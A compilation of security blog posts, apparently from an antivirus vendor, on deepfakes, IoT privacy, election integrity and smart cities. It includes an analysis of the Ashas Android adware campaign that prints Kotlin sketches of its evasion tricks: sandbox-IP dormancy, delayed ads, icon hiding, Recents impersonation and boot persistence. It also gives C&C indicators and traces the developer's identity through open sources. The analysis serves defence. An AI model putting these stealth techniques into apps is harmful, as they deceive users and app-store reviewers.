Deepfakes: When seeing isn’t believing

Is the world as we know it ready for the real impact of deepfakes?

Deepfakes are rapidly becoming easier and quicker to create, and they’re opening a door to a new form of cybercrime. Although the fake videos are still mostly seen as relatively harmless or even humorous, this craze could take a more sinister turn in the future and be at the heart of political scandals, cybercrime, or even unimaginable scenarios involving fake videos – and not just ones targeting public figures.

A deepfake is the product of AI-based human-image synthesis: fake content, created either from scratch or from existing video, designed to replicate the look and sound of a real human. Such videos can look incredibly real, and currently many of them feature celebrities or public figures saying something outrageous or untrue.

New research shows a huge increase in the creation of deepfake videos, with the number online almost doubling in the last nine months alone. Deepfakes are increasing in quality at a swift rate, too. This video showing Bill Hader morphing effortlessly between Tom Cruise and Seth Rogen is just one example of how authentic these videos are starting to look, as well as sound. Searching YouTube for the term ‘deepfake’ will make you realize that we are seeing only the tip of the iceberg of what is to come.

In fact, we have already seen deepfake technology used for fraud, with a deepfaked voice reportedly used to scam a CEO out of a large sum of cash. It is believed the CEO of an unnamed UK firm thought he was on the phone with the CEO of the firm’s German parent company and followed the order to immediately transfer €220,000 (roughly US$244,000) to a Hungarian supplier’s bank account. If it is this easy to influence someone simply by asking them over the phone, then we will surely need better security in place to mitigate this threat.

Fooling the naked eye

We have also seen ‘deepnude’ apps that can turn a photo of any clothed person into a topless image in seconds. Luckily, one particular app, DeepNude, has since been taken offline, but what if it comes back in another form with a vengeance and is able to create convincingly authentic-looking video?

There is also evidence that the production of these videos is becoming a lucrative business, especially in the pornography industry. The BBC reports that “96% of these videos are of female celebrities having their likenesses swapped into sexually explicit videos – without their knowledge or consent”.

A recent California bill has taken a leap and made it illegal to create a pornographic deepfake of someone without their consent, with a penalty of up to $150,000. But chances are that no legislation will be enough to deter some people from fabricating these videos.

To be sure, an article from The Economist notes that, to make a convincing enough deepfake, you would need a serious amount of video footage and/or voice recordings, even for a short clip. I desperately wanted to create a deepfake of myself but, sadly, without many hours of footage of myself, I wasn’t able to make a deepfake of my face.

Having said that, in the not-too-distant future it may be entirely possible to take just a few short Instagram stories and create a deepfake that is believed by the majority of someone’s online followers, or by anyone else who knows them. We may see some unimaginable videos of people closer to home – the boss, our colleagues, our peers, our family. Deepfakes may also be used for bullying in schools, the office or even further afield.

Furthermore, cybercriminals will certainly use this technology more and more to spearphish victims. Deepfakes keep getting cheaper to create and are becoming near impossible to detect with the human eye alone. All that fakery could very easily muddy the water between fact and fiction, which in turn could lead us to trust nothing at all – even when our senses are telling us to believe what we see and hear.

Heading off the very real threat

So, what can be done to prepare us for this threat? First, we need to do a better job of educating people that deepfakes exist, how they work and the potential damage they can cause. We will all need to learn to treat even the most realistic videos we see as potentially total fabrications.

Secondly, technology desperately needs to get better at detecting deepfakes. There is already research going into it, but it is nowhere near where it needs to be. Although machine learning is at the heart of creating deepfakes in the first place, something needs to act as the antidote and be able to detect them without relying on human eyes alone.

Finally, social media platforms need to realize the huge potential threat posed by deepfakes: when a shocking video meets social media, it tends to spread very rapidly and could have a detrimental impact on society.

Don’t get me wrong; I hugely enjoy the development of technology and watching it unfold in front of my eyes. However, we must remain aware of how technology can sometimes affect us detrimentally, especially when machine learning is maturing at a rate quicker than ever before. Otherwise, we will soon see deepfakes become deepnorms, with far-reaching effects.

31 Oct 2019 – 11:30AM

Facebook builds tool to confound facial recognition

However, the social network harbors no plans to deploy the technology in any of its services any time soon

Facebook has developed a machine-learning method that aims to help with face de-identification in video content. In its paper, the Facebook AI research team explains it has developed the technology in response to ethical concerns that arise from misuse of face replacement technology. One example is the unsettling popularity of deepfakes.

Among other ‘tricks’, Facebook’s technology relies on altering lip positioning, illumination and shadows. The video is generated so that no visible distortions appear: only the face is subtly altered, while everything else in the video looks the same. In other words, the new method aims to change the person’s appearance so that the face looks more or less the same to the human eye, yet is different enough to confound facial recognition.

The technology was tested in a series of experiments involving both state-of-the-art facial recognition systems and actual people. The volunteers were told how the videos had been manipulated, yet they were able to tell the real video from the altered one only around 50 percent of the time – no better than chance.


Video source: Oran Gafni/YouTube

The paper concludes that with the advances in facial recognition technology (and its abuse), there is a greater need for understanding and creating methods that are able to counter such abuse.

Meanwhile, VentureBeat quoted a Facebook spokesperson as saying that the social network has no plans to leverage this technology in any of its products in the foreseeable future. Still, the researchers believe that their work could lead to the development of tools that help safeguard people’s privacy.

With the gradual erosion of privacy – which many fear is partly driven by the use of facial recognition systems, and especially by their potential for misuse – this is a welcome development.

30 Oct 2019 – 05:59PM


What you may be getting wrong about cybersecurity

Attention-grabbing cyberattacks that use fiendish exploits are probably not the kind of threat that should be your main concern – here’s what your organization should focus on instead

When we hear about breaches, we assume that attackers used some never-before-seen, zero-day exploit to breach our defenses. This situation is normally far from the truth. While it is true that nation-states hold onto tastily crafted zero days that they use to infiltrate the most nationally significant targets, those targets are not you. And they’re probably not your organization, either.

At this year’s Virus Bulletin Conference, much like in years past, we were regaled with many tales of attacks against financially important, high-profile targets. But in the end, the bad actors didn’t get in with the scariest ’sploits. They got in with a phishing email, or, as in a case that one presenter from RiskIQ highlighted, they used wide-open permissions within a very popular cloud resource.

The truth is that the soft underbelly of the security industry consists of hackers taking the path of least resistance: quite often this path is paved with misconfigured security software, human error, or other operational security issues. In other words, it’s not super-“l33t” hackers; it’s you.

Even if you think you’re doing everything right within your own organization, that may still not be enough. While you may have thoroughly secured your own network, those you interact with may not be so locked down. You may think that because you’ve eschewed third-party software and don’t use the cloud for collaboration, you’re safe in your enclave. However, third parties within your supply chain may be using cloud services in ways that endanger you – and sometimes neither you nor they even know that this has created significant risk to both of your environments.

Not to worry, you’re not alone, and there are things you can do about it.

High-profile breaches these days often start with third parties you use. While you might have the greatest security team out there, maybe they don’t.

Not sure? Here are a few obvious (or not-so-obvious) things you can check with your teams:

Cloud permissions
It’s certainly convenient for teams sharing cloud resources – especially a file share – to give everyone full permissions to add, change or delete files. But this can also open you up to trouble. Especially for projects and teams that are hastily thrown together, a “temporary” cloud-based resource may be tossed together without considering best security practices. This often means everyone having wide-open permissions so that everything “just works”. And these resources have a way of outlasting a Hollywood marriage by years, all the while exposing a huge gap in your defenses.

Collaboration platforms
Do your teams or your third-party vendors use unsecured and/or unmonitored messaging services, forums or platforms to discuss your business? If criminals (or even competitors!) can access internal communications about your business, this could cause huge problems. At the very least, it could hand significant resources to attackers looking to socially engineer their way into your network.

Corporate email compromise
How well have you locked down the ability to send email from your domain? Could that flood of phish be coming from inside your own house? If you’re not taking good care of your email security, attackers could be using your good name to steal the trust they need to fool people into clicking malicious links. Too few companies use email authentication standards like DMARC, DKIM or SPF to help verify valid messages – something we’d like to see change for the better. A quick way to check your own domain is sketched below.
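As a quick self-check on that last point, here is a minimal sketch (ours, not something from the original article) that looks up a domain’s SPF and DMARC TXT records using the JVM’s built-in JNDI DNS provider; the domain name is a placeholder, and a missing record simply prints as “none found”:

```kotlin
import java.util.Hashtable
import javax.naming.NamingException
import javax.naming.directory.InitialDirContext

// Look up the TXT records published for a DNS name via the JDK's JNDI DNS provider.
fun txtRecords(name: String): List<String> {
    val env = Hashtable<String, String>()
    env["java.naming.factory.initial"] = "com.sun.jndi.dns.DnsContextFactory"
    val ctx = InitialDirContext(env)
    return try {
        val txt = ctx.getAttributes(name, arrayOf("TXT")).get("TXT") ?: return emptyList()
        (0 until txt.size()).map { txt.get(it).toString() }
    } catch (e: NamingException) {
        emptyList() // no such record, or the lookup failed
    } finally {
        ctx.close()
    }
}

fun main() {
    val domain = "example.com" // placeholder: replace with your own domain
    val spf = txtRecords(domain).filter { it.startsWith("v=spf1") }
    val dmarc = txtRecords("_dmarc.$domain").filter { it.startsWith("v=DMARC1") }
    println("SPF:   ${if (spf.isEmpty()) "none found" else spf}")
    println("DMARC: ${if (dmarc.isEmpty()) "none found" else dmarc}")
}
```

DKIM is omitted here because checking it requires knowing the sender’s selector; SPF and DMARC can be verified from the domain name alone.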

It certainly can be tempting to keep chasing whatever flashy and dramatic new threats attackers come up with, but in the end it’s most important to make sure you’re filling the simple cracks in your own edifice. As technology becomes more ubiquitous, it also introduces more complexity. By thoroughly addressing these simpler (if less exciting) problems, we can devote less brainpower to stressing about the space-age techniques being used against high-value targets, and use that reclaimed mental bandwidth to actually make things more secure.

29 Oct 2019 – 11:30AM

Week in security with Tony Anscombe

This week, ESET researchers released their findings on Winnti Group’s MSSQL backdoor and showed how they’d tracked down the operator of an adware campaign that victimized millions of Android users.

ESET researchers uncover a previously undocumented backdoor that targets Microsoft SQL servers and allows attackers to maintain a very discreet foothold inside compromised organizations. Also this week, ESET researchers published their findings about a year-long adware campaign that victimized millions of Android users. And, as cities seek to become smart cities, we ponder the risks of failing to consider the security of smart technologies.

Your smart doorbell may be collecting more data than you think, study finds

The study tested 81 IoT devices to analyze their behavior and tracking habits, and in some cases brought rather surprising findings

Have you ever stopped to think what kind of data an innocuous-looking smart device may collect, where that information is sent, and whether it is encrypted? Researchers at Northeastern University and Imperial College London have looked into this very issue, conducting a range of experiments in controlled environments in both the United States and the United Kingdom.

Their paper shows that the researchers took an interesting approach, configuring their US lab to look like a studio apartment with all the IoT devices integrated. The “studio lab” was used by 36 participants over six months, who interacted with the devices as they would in day-to-day use. These experiments were uncontrolled and consisted of capturing all the unlabeled traffic generated by the devices. The results are outlined in the full paper, called Information Exposure From Consumer IoT Devices.

For example, two of the tested smart doorbells were shown to perform rather unexpected tasks. The integrated camera on one of the doorbells uploaded a snapshot after its first activation and every time someone moved in front of it – a feature that was not disclosed anywhere. Curiously, there was no way to access these snapshots, which begs the question: where were these snapshots being uploaded and why wasn’t there a way to access them?

The other doorbell, meanwhile, recorded a video every time a user moved in front of it, and the companion app that is used to set up the device failed to disclose that a real-time recording was being captured, although this information could be found in the privacy policy. That said, when the researchers tried to log into the account associated with the doorbell, they found out that the recordings are accessible only after a monthly fee is paid. Upon further investigation, they couldn’t find a way to disable this feature.

The study also analyzed where the IoT devices send some of their network traffic. Most of the devices (31 in the US and 24 in the UK) sent data to at least one server run on Amazon Web Services (AWS), the cloud platform of choice for most companies in the study. The other frequently contacted addresses belonged to cloud platforms run by Microsoft or Google.
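To illustrate the kind of tallying involved (this sketch and its hostnames are our own illustration, not the study’s tooling), grouping the contacted hostnames by their parent domain is enough to see which providers dominate:

```kotlin
fun main() {
    // Hypothetical list of hostnames observed in captured device traffic.
    val contacted = listOf(
        "ec2-3-120-0-1.eu-central-1.compute.amazonaws.com",
        "device-metrics-us.amazonaws.com",
        "clients3.google.com",
        "settings-win.data.microsoft.com",
        "api-global.netflix.com"
    )

    contacted
        .map { it.split(".").takeLast(2).joinToString(".") } // crude parent-domain cut
        .groupingBy { it }
        .eachCount()
        .entries
        .sortedByDescending { it.value }
        .forEach { (domain, count) -> println("$domain: $count connection(s)") }
}
```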

When it comes to the tested smart TVs, almost all of them contacted Netflix, which is curious since none of the TVs were ever configured with a Netflix account. A contrast between the US and the European Union can be seen in that devices in the US lab contacted more non-first parties, which may be attributed to the US’s less strict privacy regulations compared with those of the EU. One of our recent articles looked at how streaming devices track people’s viewing habits.

On the one hand, the conclusion does not seem all that bleak, with the researchers praising the fact that a number of devices used encryption to protect their users’ personal data, with minimal exposure in plain text. On the other hand, devices that lack encryption may expose people’s data to prying eyes and allow observers to work out how the devices are being used.

These kinds of studies offer valuable insight into what some IoT devices are up to and what kind of data they collect – especially if we consider that many of us may not have healthy cybersecurity habits, as evidenced by a recent survey conducted by ESET.

25 Oct 2019 – 12:43PM

Facebook lays out plan to protect elections

How is the social network preparing to curtail the spread of misinformation as the election season heats up?

From congressional hearings to meeting with law enforcement and intelligence officials, social media companies have been in the spotlight in advance of the 2020 election season. Indeed, the 2016 US presidential election, which was mired in controversy and allegations of election meddling, is still fresh in the minds of some. So, it comes as no surprise that social media behemoths are ramping up their game, preparing measures to ward off threats to election integrity.

With the 2020 US presidential election just over a year away, Facebook, for one, announced measures earlier this week that are designed to stop election interference. Its efforts are concentrated in three main pillars: fighting interference, increasing transparency, and reducing misinformation. Each of these pillars is broken down into a variety of steps that the social network is taking to achieve these goals.

Combating inauthentic behavior is one such step. An example is Facebook’s removal of Pages, Groups and accounts on both Facebook and Instagram that exerted influence by engaging in coordinated manipulative activities. The plug was pulled based on the behavior of these accounts, not purely on the content they shared.

The social network has also launched a new Facebook Protect feature, which adds an extra layer of security to the accounts of political figures and their staff. The feature includes mandatory two-factor authentication, and accounts enrolled in Facebook Protect will be actively monitored for signs of hacking. The social media giant admits, however, that the measure is not foolproof, stating in its press release that “because campaigns are generally run for a short period of time, we don’t always know who these campaign-affiliated people are, making it harder to help protect them”.

To curb misinformation on both Facebook and Instagram, the company reduces the distribution of such content, so that it reaches fewer people, and removes it from the Explore and News Feed features. If content has been rated false or partly false by a third-party fact-checker, it is labeled as such, and it is left to users’ discretion to decide whether it is trustworthy. If users attempt to share such content, a pop-up warns them that the post in question contains false information debunked by the fact-checker.

To increase transparency, Facebook now lets users check the provenance of a Page by showing its primary country location and whether it has merged with other Pages. In addition, more context is provided by extra information that must be disclosed, such as the “Organizations that manage this Page” tab, which contains the organization’s legal name, verified city, phone number and website. This will be visible on Pages that have a large US audience and have undergone Facebook’s business verification process.

A new approach will also be taken toward state-controlled media – outlets that are wholly or partially under the editorial control of their government. These outlets will be labeled both on their Pages and in Facebook’s Ad Library, and will be held to a higher standard of transparency.

Meanwhile, Twitter disclosed its efforts in preventing platform manipulation last month. It plans to keep enhancing its efforts in this area, by routinely disclosing data that is related to state-backed information operations on their network.

24 Oct 2019 – 05:27PM

Tracking down the developer of Android adware affecting millions of users

ESET researchers discovered a year-long adware campaign on Google Play and tracked down its operator. The apps involved, installed eight million times, use several tricks for stealth and persistence.

We detected a large adware campaign running for about a year, with the involved apps installed eight million times from Google Play alone.

We identified 42 apps on Google Play as belonging to the campaign, which had been running since July 2018. Of those, 21 were still available at the time of discovery. We reported the apps to the Google security team and they were swiftly removed. However, the apps are still available in third-party app stores. ESET detects this adware, collectively, as Android/AdDisplay.Ashas.

Figure 1. Apps of the Android/AdDisplay.Ashas family reported to Google by ESET

Figure 2. The most popular member of the Android/AdDisplay.Ashas family on Google Play was “Video downloader master” with over five million downloads

Ashas functionality

All the apps provide the functionality they promise, in addition to working as adware. The adware functionality is the same in all the apps we analyzed. [Note: The analysis of the functionality below describes a single app, but applies to all apps of the Android/AdDisplay.Ashas family.]

Once launched, the app starts to communicate with its C&C server (whose IP address is base64-encoded in the app). It sends “home” key data about the affected device: device type, OS version, language, number of installed apps, free storage space, battery status, whether the device is rooted and has Developer mode enabled, and whether Facebook and FB Messenger are installed.

Figure 3. Sending information about the affected device
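As a rough illustration of this phone-home step (the encoded address and the field names below are our placeholders, not the actual Ashas protocol), decoding the bundled C&C address and assembling the device report could look like this:

```kotlin
import java.util.Base64

// Illustrative only: field names are assumptions based on the data listed above.
data class DeviceReport(
    val deviceType: String,
    val osVersion: String,
    val language: String,
    val installedApps: Int,
    val freeStorageMb: Long,
    val batteryPct: Int,
    val isRooted: Boolean,
    val developerMode: Boolean,
    val hasFacebook: Boolean,
    val hasMessenger: Boolean
)

fun main() {
    // The C&C address ships base64-encoded inside the app; recovering it is a one-liner.
    // This placeholder decodes to the documentation address http://192.0.2.1:8080.
    val encoded = "aHR0cDovLzE5Mi4wLjIuMTo4MDgw"
    val c2 = String(Base64.getDecoder().decode(encoded))
    println("C&C endpoint: $c2")

    val report = DeviceReport(
        deviceType = "phone", osVersion = "9", language = "en",
        installedApps = 120, freeStorageMb = 2048, batteryPct = 87,
        isRooted = false, developerMode = true,
        hasFacebook = true, hasMessenger = false
    )
    println("Would send home: $report")
}
```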

The app receives configuration data from the C&C server, needed for displaying ads, and for stealth and resilience.

Figure 4. Configuration file received from the C&C server

As for stealth and resilience, the attacker uses a number of tricks.

First, the malicious app tries to determine whether it is being tested by the Google Play security mechanism. For this purpose, the app receives from the C&C server the isGoogleIp flag, which indicates whether the IP address of the affected device falls within the range of known IP addresses for Google servers. If the server returns this flag as positive, the app will not trigger the adware payload.

Second, the app can set a custom delay between displaying ads. The samples we have seen had their configuration set to delay displaying the first ad by 24 minutes after the device unlocks. This delay means that a typical testing procedure, which takes less than 10 minutes, will not detect any unwanted behavior. Also, the longer the delay, the lower the risk of the user associating the unwanted ads with a particular app.

Third, based on the server response, the app can also hide its icon and create a shortcut instead. If a typical user tries to get rid of the malicious app, chances are that only the shortcut ends up getting removed. The app then continues to run in the background without the user’s knowledge. This stealth technique has been gaining popularity among adware-related threats distributed via Google Play.

Figure 5. Time delay to postpone displaying ads implemented by the adware
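A hedged Android/Kotlin sketch of how these three tricks could be wired together follows; the class and field names are our assumptions based on the behavior described above, not the actual Ashas code:

```kotlin
import android.app.Activity
import android.content.ComponentName
import android.content.Context
import android.content.pm.PackageManager
import android.os.Handler
import android.os.Looper

// Config fields modeled on the behavior described in the article (assumed names).
data class C2Config(
    val isGoogleIp: Boolean,   // server-side guess that the device sits in a Google IP range
    val firstAdDelayMs: Long,  // e.g. 24 * 60 * 1000L for the 24-minute delay
    val hideIcon: Boolean
)

class MainActivity : Activity()

class AdController(private val context: Context) {
    fun apply(config: C2Config, showAd: () -> Unit) {
        // Trick 1: if the C&C flags this device as a likely Google Play test machine, stay dormant.
        if (config.isGoogleIp) return

        // Trick 2: postpone the first ad well beyond a typical ~10-minute review window.
        Handler(Looper.getMainLooper()).postDelayed({ showAd() }, config.firstAdDelayMs)

        // Trick 3: disable the launcher entry so that removing the shortcut the user sees
        // leaves the real package running in the background.
        if (config.hideIcon) {
            val launcher = ComponentName(context, MainActivity::class.java)
            context.packageManager.setComponentEnabledSetting(
                launcher,
                PackageManager.COMPONENT_ENABLED_STATE_DISABLED,
                PackageManager.DONT_KILL_APP
            )
        }
    }
}
```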

Once the malicious app receives its configuration data, the affected device is ready to display ads of the attacker’s choice; each ad is shown as a full-screen activity. If the user tries to check which app is responsible for the ad being displayed by hitting the “Recent apps” button, another trick comes into play: the app displays a Facebook or Google icon, as seen in Figure 6. The adware mimics these two apps to look legitimate and avoid suspicion – and thus stay on the affected device for as long as possible.

Figure 6. The adware activity impersonates Facebook (left). If the user long-presses the icon, the name of the app responsible for the activity is revealed (right).
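One plausible way to achieve this Recents-screen impersonation on Android (API 21 and later) is the task-description API; the activity and resource names below are placeholders, and this is our reconstruction rather than decompiled Ashas code:

```kotlin
import android.app.Activity
import android.app.ActivityManager
import android.graphics.BitmapFactory
import android.os.Bundle

class FullScreenAdActivity : Activity() {
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        // R.drawable.fake_brand_icon is a placeholder resource bundled with the app.
        val icon = BitmapFactory.decodeResource(resources, R.drawable.fake_brand_icon)
        // Override the label and icon this task shows in the "Recent apps" switcher.
        setTaskDescription(ActivityManager.TaskDescription("Facebook", icon))
    }
}
```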

Finally, the Ashas adware family has its code hidden under the com.google.xxx package name. This trick – posing as a part of a legitimate Google service – may help avoid scrutiny. Some detection mechanisms and sandboxes may whitelist such package names, in an effort to prevent wasting resources.

Figure 7. Malicious code hidden in a package named “com.google”

Hunting down the developer

Using open-source information, we tracked down the developer of the adware, whom we also identified as the campaign’s operator and owner of the C&C server. In the following paragraphs, we outline our efforts to discover other applications from the same developer and protect our users from this adware.

First, based on information that is associated with the registered C&C domain, we identified the name of the registrant, along with further data like country and email address, as seen in Figure 8.

Figure 8. Information about the C&C domain used by the Ashas adware

Knowing that the information provided to a domain registrar might be fake, we continued our search. The email address and country information drove us to a list of students attending a class at a Vietnamese university – corroborating the existence of the person under whose name the domain was registered.

Figure 9. A university class student list including the C&C domain registrant

Due to poor privacy practices on the part of our culprit’s university, we now know his probable date of birth (he seemingly used his birth year as part of his Gmail address, which offers further partial confirmation), that he was a student, and which university he attended. We were also able to confirm that the phone number he provided to the domain registrar is genuine. Moreover, we retrieved his university ID; a quick Google search turned up some of his exam grades. However, his study results are outside the scope of our research.

Based on our culprit’s email address, we were able to find his GitHub repository. His repository proves that he is indeed an Android developer, but it contained no publicly available code of the Ashas adware at the time of writing of this blogpost.

However, a simple Google search for the adware package name returned a “TestDelete” project that had been available in his repository at some point.

The malicious developer also has apps in Apple’s App Store. Some of them are iOS versions of the ones removed from Google Play, but none contain adware functionality.

Figure 10. The malicious developer’s apps published on the App Store which don’t contain the Ashas adware

Searching further into the malicious developer’s activities, we also discovered his YouTube channel propagating the Ashas adware and his other projects. As for the Ashas family, one of the associated promotional videos, “Head Soccer World Champion 2018 – Android, ios”, was viewed almost three million times, and two others reached hundreds of thousands of views, as seen in Figure 11.

Figure 11. YouTube channel of the malicious developer

His YouTube channel provided us with another valuable piece of information: he himself features in a video tutorial for one of his other projects. Thanks to that project, we were able to extract his Facebook profile – which lists his studies at the aforementioned university.

Figure 12. Facebook profile of the C&C domain registrant (cover picture and profile picture edited out)

Linked on the malicious developer’s Facebook profile, we discovered a Facebook page, Minigameshouse, and an associated domain, minigameshouse[.]net. This domain is similar to the one the malware author used for his adware C&C communication, minigameshouse[.]us.

Checking this Minigameshouse page further indicates that this person is indeed the owner of the minigameshouse[.]us domain: the phone number registered with this domain is the same as the phone number appearing on the Facebook page.

Figure 13. Facebook page managed by the C&C domain registrant uses the same base domain name (minigameshouse) and phone number as the registered malicious C&C used by the Ashas adware

Interestingly, on the Minigameshouse Facebook page, the malicious developer promotes a slew of games beyond the Ashas family for download on both Google Play and the App Store. However, all of them have since been removed from Google Play – even though some of them didn’t contain any adware functionality.

On top of all this, one of the malicious developer’s YouTube videos – a tutorial on developing an “Instant Game” for Facebook – serves as an example of operational security completely ignored. We were able to see that his recently visited web sites were Google Play pages belonging to apps containing the Ashas adware. He also used his email account to log into various services in the video, which identifies him as the adware domain owner, beyond any doubt.

Thanks to the video, we were even able to identify three further apps that contained adware functionality and were available on Google Play.

Figure 14. Screenshots from this developer’s YouTube video show a history of checking Ashas adware apps on Google Play

ESET telemetry

Figure 15. ESET detections of Android/AdDisplay.Ashas on Android devices by country

Is adware harmful?

Because the real nature of apps containing adware is usually hidden to the user, these apps and their developers should be considered untrustworthy. When installed on a device, apps containing adware may, among other things:

  • Annoy users with intrusive advertisements, including scam ads
  • Waste the device’s battery resources
  • Generate increased network traffic
  • Gather users’ personal information
  • Hide their presence on the affected device to achieve persistence
  • Generate revenue for their operator without any user interaction

Conclusion

Based solely on open source intelligence, we were able to trace the developer of the Ashas adware, establish his identity, and discover additional related adware-infected apps. Seeing that the developer did not take any measures to protect his identity, it seems likely that his intentions weren’t dishonest at first – an impression also supported by the fact that not all of his published apps contained unwanted ads.

At some point in his Google Play “career”, he apparently decided to increase his ad revenue by implementing adware functionality in his apps’ code. The various stealth and resilience techniques implemented in the adware show us that the culprit was aware of the malicious nature of the added functionality and attempted to keep it hidden.

Sneaking unwanted or harmful functionality into popular, benign apps is a common practice among “bad” developers, and we are committed to tracking down such apps. We report them to Google and take other steps to disrupt malicious campaigns we discover. Last but not least, we publish our findings to help Android users protect themselves.

Indicators of Compromise (IoCs)

Package name Hash Installs
com.ngocph.masterfree c1c958afa12a4fceb595539c6d208e6b103415d7 5,000,000+
com.mghstudio.ringtonemaker 7a8640d4a766c3e4c4707f038c12f30ad7e21876 500,000+
com.hunghh.instadownloader 8421f9f25dd30766f864490c26766d381b89dbee 500,000+
com.chungit.tank1990 237f9bfe204e857abb51db15d6092d350ad3eb01 500,000+
com.video.downloadmasterfree 43fea80444befe79b55e1f05d980261318472dff 100,000+
com.massapp.instadownloader 1382c2990bdce7d0aa081336214b78a06fceef62 100,000+
com.chungit.tankbattle 1630b926c1732ca0bb2f1150ad491e19030bcbf2 100,000+
com.chungit.basketball 188ca2d47e1fe777c6e9223e6f0f487cb5e98f2d 100,000+
com.applecat.worldchampion2018 502a1d6ab73d0aaa4d7821d6568833028b6595ec 100,000+
org.minigamehouse.photoalbum a8e02fbd37d0787ee28d444272d72b894041003a 100,000+
com.mngh.tuanvn.fbvideodownloader 035624f9ac5f76cc38707f796457a34ec2a97946 100,000+
com.v2social.socialdownloader 2b84fb67519487d676844e5744d8d3d1c935c4b7 100,000+
com.hikeforig.hashtag 8ed42a6bcb14396563bb2475528d708c368da316 100,000+
com.chungit.heroesjump c72e92e675afceca23bbe77008d921195114700c 100,000+
com.mp4.video.downloader 61E2C86199B2D94ABF2F7508300E3DB44AE1C6F1 100,000+
com.videotomp4.downloader 1f54e35729a5409628511b9bf6503863e9353ec9 50,000+
boxs.puzzles.Puzzlebox b084a07fdfd1db25354ad3afea6fa7af497fb7dc 50,000+
com.intatwitfb.download.videodownloader 8d5ef663c32c1dbcdd5cd7af14674a02fed30467 50,000+
com.doscreenrecorder.screenrecorder e7da1b95e5ddfd2ac71587ad3f95b2bb5c0f365d 50,000+
com.toptools.allvideodownloader 32E476EA431C6F0995C75ACC5980BDBEF07C8F7F 50,000+
com.top1.videodownloader a24529933f57aa46ee5a9fd3c3f7234a1642fe17 10,000+
com.santastudio.headsoccer2 86d48c25d24842bac634c2bd75dbf721bcf4e2ea 10,000+
com.ringtonemakerpro.ringtonemakerapp2019 5ce9f25dc32ac8b00b9abc3754202e96ef7d66d9 10,000+
com.hugofq.solucionariodebaldor 3bb546880d93e9743ac99ad4295ccaf982920260 10,000+
com.anit.bouncingball 6e93a24fb64d2f6db2095bb17afa12c34b2c8452 10,000+
com.dktools.liteforfb 7bc079b1d01686d974888aa5398d6de54fd9d116 10,000+
net.radiogroup.tvnradio ba29f0b4ad14b3d77956ae70d812eae6ac761bee 10,000+
com.anit.bouncingball 6E93A24FB64D2F6DB2095BB17AFA12C34B2C8452 10,000+
com.floating.tube.bymuicv 6A57D380CDDCD4726ED2CF0E98156BA404112A53 10,000+
org.cocos2dx.SpiderSolitaireGames adbb603195c1cc33f8317ba9f05ae9b74759e75b 5,000+
games.puzzle.crosssum 31088dc35a864158205e89403e1fb46ef6c2c3cd 5,000+
dots.yellow.craft 413ce03236d3604c6c15fc8d1ec3c9887633396c 5,000+
com.tvngroup.ankina.reminderWater 5205a5d78b58a178c389cd1a7b6651fe5eb7eb09 5,000+
com.hdevs.ringtonemaker2019 ba5a4220d30579195a83ddc4c0897eec9df59cb7 5,000+
com.carlosapps.solucionariodebaldor 741a95c34d3ad817582d27783551b5c85c4c605b 5,000+
com.mngh1.flatmusic 32353fae3082eaeedd6c56bb90836c89893dc42c 5,000+
com.tvn.app.smartnote ddf1f864325b76bc7c0a7cfa452562fe0fd41351 1,000+
com.thrtop.alldownloader f46ef932a5f8e946a274961d5bdd789194bd2a7d 1,000+
com.anthu91.soccercard 0913a34436d1a7fcd9b6599fba64102352ef2a4a 1,000+
com.hugofq.wismichudosmildiecisiete 4715bd777d0e76ca954685eb32dc4d16e609824f 1,000+
com.gamebasketball.basketballperfectshot e97133aaf7d4bf90f93fefb405cb71a287790839 1,000+
com.nteam.solitairefree 3095f0f99300c04f5ba877f87ab86636129769b1 100+
com.instafollowers.hiketop 3a14407c3a8ef54f9cba8f61a271ab94013340f8 1+

C&C server

http://35.198.197[.]119:8080

MITRE ATT&CK techniques

Tactic ID Name Description
Initial Access T1475 Deliver Malicious App via Authorized App Store The malware impersonates legitimate services on Google Play
Persistence T1402 App Auto-Start at Device Boot An Android application can listen for the BOOT_COMPLETED broadcast, ensuring that the app’s functionality will be activated every time the device starts
Impact T1472 Generate Fraudulent Advertising Revenue Generates revenue by automatically displaying ads
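For reference, the T1402 technique in the table boils down to a boot receiver. A minimal, hypothetical Kotlin sketch follows; the manifest would also need the RECEIVE_BOOT_COMPLETED permission and an intent filter for android.intent.action.BOOT_COMPLETED:

```kotlin
import android.content.BroadcastReceiver
import android.content.Context
import android.content.Intent

class BootReceiver : BroadcastReceiver() {
    override fun onReceive(context: Context, intent: Intent) {
        if (intent.action == Intent.ACTION_BOOT_COMPLETED) {
            // A real sample would re-schedule its ad-display job here;
            // scheduleAdJob is a placeholder, not an Ashas function name.
            scheduleAdJob(context)
        }
    }

    private fun scheduleAdJob(context: Context) {
        // Placeholder: e.g. enqueue a background job or start a service.
    }
}
```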

Kudos to @jaymin9687 for bringing the problem of unwanted ads in the “Video downloader master” app to our attention.

24 Oct 2019 – 11:30AM

Smart cities must be cyber‑smart cities

As cities turn to IoT to address long-standing urban problems, what are the risks of leaving cybersecurity behind at the planning phase?

You’ve probably heard the term “smart cities” – that is, the idea that extensive use of Information and Communications Technology (ICT) to monitor energy, utilities and transportation infrastructure can lead to cost savings, reduction of environmental impact and faster fault resolution.

The benefits are obvious. If a street lamp fails, and can tell you so, you can replace it more quickly. If you can control traffic more efficiently, you’ll reduce smog and noise, and reduce overall journey times. If you can tie AC/heating to ambient temperature in a fine-grained way, you can reduce power consumption and wastage. If you can track traffic in real time, you can plan the best routes for emergency response vehicles.

Most national governments have committed to the Paris Agreement, and therefore need to reach targets for reduced carbon emissions. These targets necessarily pass down to the regional and municipal levels, and the implementation of smart technologies in urban areas has a large part to play in achieving those goals. However, where there are complex, interconnected, computer-controlled networks of thousands of Internet of Things (IoT) sensors and devices, all sorts of alarm bells start to ring in the minds of cybersecurity practitioners.

ESET researchers have analyzed malware (e.g. here and here) that was most probably used in several attacks against the energy industry and ultimately caused power outages. This sort of disruption has major effects on people’s lives, and intermittent or unreliable power does not take long to cause problems. Foods and medicines start to decay rapidly as refrigeration and freezers start to heat up. Hospitals must reduce power consumption to the essentials. Petrol pumps don’t work (nor for that matter do smart vehicle charging stations), traffic light systems go down, buildings start to over-heat, or over-cool. Street lighting stops working. Electronic payment doesn’t work, wages may not be paid, ATMs don’t dispense cash. You can’t recharge your phone or your laptop. Your insulin pump won’t charge, your CPAP (continuous positive airway pressure) device won’t work, nor will your remote monitoring systems, your security cameras – or your coffee machine! It doesn’t take much to understand that in these circumstances chaos quickly ensues.

